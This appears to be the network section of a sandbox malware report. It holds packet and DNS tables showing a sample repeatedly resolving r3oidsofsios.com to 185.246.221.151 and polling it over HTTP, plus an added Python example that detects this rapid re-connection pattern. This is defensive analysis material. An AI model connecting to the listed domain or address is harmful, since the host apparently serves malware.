                          Nov 30, 2022 00:12:36.694561958 CET4973080192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:36.730839014 CET8049730185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:36.998038054 CET4973180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.030442953 CET8049731185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.030910969 CET4973180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.030910969 CET4973180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.030910969 CET4973180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.061671019 CET8049731185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.153716087 CET8049731185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.154509068 CET4973180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.154568911 CET4973180192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.183823109 CET8049731185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.184279919 CET4973280192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.214330912 CET8049732185.246.221.151192.168.2.7
                          Nov 30, 2022 00:12:37.214524984 CET4973280192.168.2.7185.246.221.151
                          Nov 30, 2022 00:12:37.214968920 CET4973280192.168.2.7185.246.221.151
Nov 30, 2022 00:12:37.214968920 CET | 49732 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:37.243493080 CET | 80 | 49732 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:37.334481001 CET | 80 | 49732 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:37.334733009 CET | 49732 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:37.335803986 CET | 49732 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:37.363866091 CET | 80 | 49732 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:37.374278069 CET | 49733 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:37.403678894 CET | 80 | 49733 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:37.403834105 CET | 49733 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:37.404042959 CET | 49733 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:37.404042959 CET | 49733 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:37.432388067 CET | 80 | 49733 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:37.519344091 CET | 80 | 49733 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:37.519987106 CET | 49733 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:37.520072937 CET | 49733 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:37.550010920 CET | 49734 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:37.550288916 CET | 80 | 49733 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:37.577991009 CET | 80 | 49734 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:37.578107119 CET | 49734 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:37.578322887 CET | 49734 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:37.578350067 CET | 49734 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:37.611852884 CET | 80 | 49734 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:37.706790924 CET | 80 | 49734 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:37.711175919 CET | 49734 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:37.711175919 CET | 49734 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:37.751033068 CET | 80 | 49734 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:37.756057978 CET | 49735 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:37.810843945 CET | 80 | 49735 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:37.811109066 CET | 49735 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:37.811109066 CET | 49735 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:37.811254025 CET | 49735 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:37.842073917 CET | 80 | 49735 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:37.938654900 CET | 80 | 49735 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:37.939137936 CET | 49735 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:37.939138889 CET | 49735 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:37.968122959 CET | 80 | 49735 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:37.970060110 CET | 49736 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:37.998667955 CET | 80 | 49736 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:37.999078035 CET | 49736 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:38.007920027 CET | 49736 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:38.007920027 CET | 49736 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:38.036375046 CET | 80 | 49736 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:38.127856016 CET | 80 | 49736 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:38.128108978 CET | 49736 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:38.128170967 CET | 49736 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:38.155149937 CET | 80 | 49736 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:38.159787893 CET | 49737 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:38.187099934 CET | 80 | 49737 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:38.187350988 CET | 49737 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:38.187767029 CET | 49737 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:38.187999964 CET | 49737 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:38.216401100 CET | 80 | 49737 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:38.306819916 CET | 80 | 49737 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:38.307228088 CET | 80 | 49737 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:38.307271004 CET | 49737 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:38.307588100 CET | 49737 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:38.336150885 CET | 80 | 49737 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:38.361372948 CET | 49738 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:38.389053106 CET | 80 | 49738 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:38.389161110 CET | 49738 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:38.389544964 CET | 49738 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:38.389569998 CET | 49738 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:38.416693926 CET | 80 | 49738 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:38.503267050 CET | 80 | 49738 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:38.503588915 CET | 49738 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:38.522610903 CET | 49738 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:38.555016041 CET | 80 | 49738 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:38.774741888 CET | 49739 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:38.807013035 CET | 80 | 49739 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:38.807307005 CET | 49739 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:38.844290018 CET | 49739 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:38.844290018 CET | 49739 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:38.875030041 CET | 80 | 49739 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:38.964234114 CET | 80 | 49739 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:38.964453936 CET | 49739 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:38.972148895 CET | 49739 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:39.000761986 CET | 80 | 49739 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:39.004362106 CET | 49740 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:39.042252064 CET | 80 | 49740 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:39.042609930 CET | 49740 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:39.079370022 CET | 49740 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:39.079370022 CET | 49740 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:39.110649109 CET | 80 | 49740 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:39.204178095 CET | 80 | 49740 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:39.205167055 CET | 49740 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:39.205579996 CET | 49740 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:39.234817982 CET | 80 | 49740 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:39.293708086 CET | 49741 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:39.321270943 CET | 80 | 49741 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:39.321393967 CET | 49741 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:39.321549892 CET | 49741 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:39.321588993 CET | 49741 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:39.351839066 CET | 80 | 49741 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:39.438452959 CET | 80 | 49741 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:39.439425945 CET | 80 | 49741 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:39.439560890 CET | 49741 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:39.440701962 CET | 49741 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:39.469428062 CET | 80 | 49741 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:39.527334929 CET | 49742 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:39.555160046 CET | 80 | 49742 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:39.555358887 CET | 49742 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:40.168219090 CET | 49742 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:40.168253899 CET | 49742 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:40.196892977 CET | 80 | 49742 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:40.297549009 CET | 80 | 49742 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:40.297688007 CET | 49742 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:40.308461905 CET | 49742 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:40.337305069 CET | 80 | 49742 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:40.350506067 CET | 49743 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:40.378957987 CET | 80 | 49743 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:40.379125118 CET | 49743 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:40.415658951 CET | 49743 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:40.415714025 CET | 49743 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:40.444228888 CET | 80 | 49743 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:40.529710054 CET | 80 | 49743 | 185.246.221.151 | 192.168.2.7
Nov 30, 2022 00:12:40.529802084 CET | 49743 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:40.532679081 CET | 49743 | 80 | 192.168.2.7 | 185.246.221.151
Nov 30, 2022 00:12:40.561741114 CET | 80 | 49743 | 185.246.221.151 | 192.168.2.7
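The twelve connections in the TCP table above (client ports 49732 to 49743, all to 185.246.221.151:80) open roughly 0.2 s apart and each lasts only a few packets. The following Python is an added example, not part of the Joe Sandbox report: it rebuilds connections from packet rows in the table's own format and reports how quickly the client re-connects to the same server. The rows are transcribed from the table (the first connection in full, then the opening packet of each later one); the "lower port is the server" rule and the flagging thresholds are this example's own assumptions.

```python
"""Rebuild TCP connections from a sandbox packet list and measure how fast the
sample re-connects to the same server.

Added example for this report; not Joe Sandbox code. The rows below are
transcribed from the TCP table (one full connection, then the opening packet
of each later connection); the verdict thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, median, pstdev

EPOCH = datetime(1970, 1, 1)


def parse_ts(s):
    """'Nov 30, 2022 00:12:37.214968920 CET' -> float seconds (zone label ignored,
    nanosecond fraction kept)."""
    body = s.rsplit(" ", 1)[0]                      # drop the trailing 'CET'
    main, frac = body.split(".")
    secs = (datetime.strptime(main, "%b %d, %Y %H:%M:%S") - EPOCH).total_seconds()
    return secs + int(frac) / 10 ** len(frac)


# (timestamp, src_port, dst_port, src_ip, dst_ip), transcribed from the report.
PACKETS = [
    ("Nov 30, 2022 00:12:37.214968920 CET", 49732, 80, "192.168.2.7", "185.246.221.151"),
    ("Nov 30, 2022 00:12:37.243493080 CET", 80, 49732, "185.246.221.151", "192.168.2.7"),
    ("Nov 30, 2022 00:12:37.334481001 CET", 80, 49732, "185.246.221.151", "192.168.2.7"),
    ("Nov 30, 2022 00:12:37.334733009 CET", 49732, 80, "192.168.2.7", "185.246.221.151"),
    ("Nov 30, 2022 00:12:37.335803986 CET", 49732, 80, "192.168.2.7", "185.246.221.151"),
    ("Nov 30, 2022 00:12:37.363866091 CET", 80, 49732, "185.246.221.151", "192.168.2.7"),
    ("Nov 30, 2022 00:12:37.374278069 CET", 49733, 80, "192.168.2.7", "185.246.221.151"),
    ("Nov 30, 2022 00:12:37.550010920 CET", 49734, 80, "192.168.2.7", "185.246.221.151"),
    ("Nov 30, 2022 00:12:37.756057978 CET", 49735, 80, "192.168.2.7", "185.246.221.151"),
    ("Nov 30, 2022 00:12:37.970060110 CET", 49736, 80, "192.168.2.7", "185.246.221.151"),
    ("Nov 30, 2022 00:12:38.159787893 CET", 49737, 80, "192.168.2.7", "185.246.221.151"),
    ("Nov 30, 2022 00:12:38.361372948 CET", 49738, 80, "192.168.2.7", "185.246.221.151"),
    ("Nov 30, 2022 00:12:38.774741888 CET", 49739, 80, "192.168.2.7", "185.246.221.151"),
    ("Nov 30, 2022 00:12:39.004362106 CET", 49740, 80, "192.168.2.7", "185.246.221.151"),
    ("Nov 30, 2022 00:12:39.293708086 CET", 49741, 80, "192.168.2.7", "185.246.221.151"),
    ("Nov 30, 2022 00:12:39.527334929 CET", 49742, 80, "192.168.2.7", "185.246.221.151"),
    ("Nov 30, 2022 00:12:40.350506067 CET", 49743, 80, "192.168.2.7", "185.246.221.151"),
]


def flows(packets):
    """Group packets into connections keyed by (client ip, client port, server ip,
    server port). Assumption: the endpoint with the lower port number is the server."""
    out = defaultdict(list)
    for ts, sport, dport, sip, dip in packets:
        key = (sip, sport, dip, dport) if sport > dport else (dip, dport, sip, sport)
        out[key].append(parse_ts(ts))
    return {k: sorted(v) for k, v in out.items()}


def reconnect_report(packets, min_flows=5, max_window=60.0):
    """Summarise how one client re-connects to one server.

    Returns, per (client, server, port), the connection count, the client ports
    in order of use, packets seen per connection, the gaps between connection
    starts and a verdict: True when at least `min_flows` connections start
    inside `max_window` seconds (thresholds are assumptions)."""
    by_server = defaultdict(list)
    for (cip, cport, sip, sport), times in flows(packets).items():
        by_server[(cip, sip, sport)].append((times[0], cport, len(times)))
    report = {}
    for key, conns in by_server.items():
        conns.sort()
        starts = [c[0] for c in conns]
        gaps = [b - a for a, b in zip(starts, starts[1:])]
        window = starts[-1] - starts[0]
        report[key] = {
            "connections": len(conns),
            "client_ports": [c[1] for c in conns],
            "packets_per_connection": [c[2] for c in conns],
            "gaps": gaps,
            "mean_gap": mean(gaps) if gaps else None,
            "median_gap": median(gaps) if gaps else None,
            "gap_stdev": pstdev(gaps) if len(gaps) > 1 else None,
            "window": window,
            "flagged": len(conns) >= min_flows and window <= max_window,
        }
    return report


if __name__ == "__main__":
    for key, r in reconnect_report(PACKETS).items():
        print(key, {k: v for k, v in r.items() if k != "gaps"})
```

Run on the rows above it reports twelve connections whose client ports are strictly consecutive, a median gap of about 0.21 s and a total window of about 3.1 s, which is the shape of a loader polling its server in a tight loop rather than a browser fetching a page; consecutive ephemeral ports are a side effect of one process opening one socket per request.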
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 30, 2022 00:12:31.576731920 CET | 51007 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:31.867197037 CET | 53 | 51007 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:32.519501925 CET | 50513 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:32.811173916 CET | 53 | 50513 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:33.003753901 CET | 60765 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:33.028825998 CET | 53 | 60765 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:33.193178892 CET | 58283 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:33.212548971 CET | 53 | 58283 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:33.470622063 CET | 50024 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:33.821990967 CET | 53 | 50024 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:34.020052910 CET | 49516 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:34.036792994 CET | 53 | 49516 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:34.196407080 CET | 62679 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:34.488857985 CET | 53 | 62679 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:34.650456905 CET | 61392 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:34.669634104 CET | 53 | 61392 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:34.832746983 CET | 52104 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:34.851197958 CET | 53 | 52104 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:35.027832985 CET | 65356 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:35.319250107 CET | 53 | 65356 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:35.475203037 CET | 59006 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:35.494378090 CET | 53 | 59006 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:35.653045893 CET | 51526 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:35.672054052 CET | 53 | 51526 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:35.851425886 CET | 51139 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:35.871113062 CET | 53 | 51139 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:36.038981915 CET | 58784 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:36.067956924 CET | 53 | 58784 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:36.250511885 CET | 57970 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:36.359834909 CET | 53 | 57970 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:36.525525093 CET | 64608 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:36.543272018 CET | 53 | 64608 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:36.705869913 CET | 58746 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:36.996306896 CET | 53 | 58746 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:37.164571047 CET | 62433 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:37.183329105 CET | 53 | 62433 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:37.352591038 CET | 61248 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:37.373538971 CET | 53 | 61248 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:37.531023026 CET | 52750 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:37.549065113 CET | 53 | 52750 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:37.720558882 CET | 64078 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:37.750535965 CET | 53 | 64078 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:37.949290991 CET | 50231 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:37.969152927 CET | 53 | 50231 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:38.138925076 CET | 58514 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:38.158756018 CET | 53 | 58514 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:38.340357065 CET | 51436 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:38.360474110 CET | 53 | 51436 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:38.756226063 CET | 59053 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:38.774048090 CET | 53 | 59053 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:38.983336926 CET | 51945 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:39.002141953 CET | 53 | 51945 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:39.224884987 CET | 63187 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:39.242450953 CET | 53 | 63187 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:39.508954048 CET | 64760 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:39.526495934 CET | 53 | 64760 | 8.8.8.8 | 192.168.2.7
Nov 30, 2022 00:12:40.331233978 CET | 53637 | 53 | 192.168.2.7 | 8.8.8.8
Nov 30, 2022 00:12:40.349824905 CET | 53 | 53637 | 8.8.8.8 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 30, 2022 00:12:31.576731920 CET | 192.168.2.7 | 8.8.8.8 | 0xe620 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:32.519501925 CET | 192.168.2.7 | 8.8.8.8 | 0x9a00 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:33.003753901 CET | 192.168.2.7 | 8.8.8.8 | 0xcb73 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:33.193178892 CET | 192.168.2.7 | 8.8.8.8 | 0xd2b9 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:33.470622063 CET | 192.168.2.7 | 8.8.8.8 | 0xd702 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:34.020052910 CET | 192.168.2.7 | 8.8.8.8 | 0xde7c | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:34.196407080 CET | 192.168.2.7 | 8.8.8.8 | 0x80e4 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:34.650456905 CET | 192.168.2.7 | 8.8.8.8 | 0x2609 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:34.832746983 CET | 192.168.2.7 | 8.8.8.8 | 0xbf35 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:35.027832985 CET | 192.168.2.7 | 8.8.8.8 | 0x883f | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:35.475203037 CET | 192.168.2.7 | 8.8.8.8 | 0xef7 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:35.653045893 CET | 192.168.2.7 | 8.8.8.8 | 0x7e44 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:35.851425886 CET | 192.168.2.7 | 8.8.8.8 | 0xb4f1 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:36.038981915 CET | 192.168.2.7 | 8.8.8.8 | 0x6dd1 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:36.250511885 CET | 192.168.2.7 | 8.8.8.8 | 0x8b45 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:36.525525093 CET | 192.168.2.7 | 8.8.8.8 | 0x7568 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:36.705869913 CET | 192.168.2.7 | 8.8.8.8 | 0x4443 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:37.164571047 CET | 192.168.2.7 | 8.8.8.8 | 0xc6d7 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:37.352591038 CET | 192.168.2.7 | 8.8.8.8 | 0x2915 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:37.531023026 CET | 192.168.2.7 | 8.8.8.8 | 0x8766 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:37.720558882 CET | 192.168.2.7 | 8.8.8.8 | 0xdb37 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:37.949290991 CET | 192.168.2.7 | 8.8.8.8 | 0x67f0 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:38.138925076 CET | 192.168.2.7 | 8.8.8.8 | 0xebc7 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:38.340357065 CET | 192.168.2.7 | 8.8.8.8 | 0xb147 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:38.756226063 CET | 192.168.2.7 | 8.8.8.8 | 0x39bd | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:38.983336926 CET | 192.168.2.7 | 8.8.8.8 | 0xccea | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:39.224884987 CET | 192.168.2.7 | 8.8.8.8 | 0x2155 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:39.508954048 CET | 192.168.2.7 | 8.8.8.8 | 0xa014 | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:40.331233978 CET | 192.168.2.7 | 8.8.8.8 | 0xec7a | Standard query (0) | r3oidsofsios.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 30, 2022 00:12:31.867197037 CET | 8.8.8.8 | 192.168.2.7 | 0xe620 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:32.811173916 CET | 8.8.8.8 | 192.168.2.7 | 0x9a00 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:12:33.028825998 CET | 8.8.8.8 | 192.168.2.7 | 0xcb73 | No error (0) | r3oidsofsios.com | - | 185.246.221.151 | A (IP address) | IN (0x0001) | false
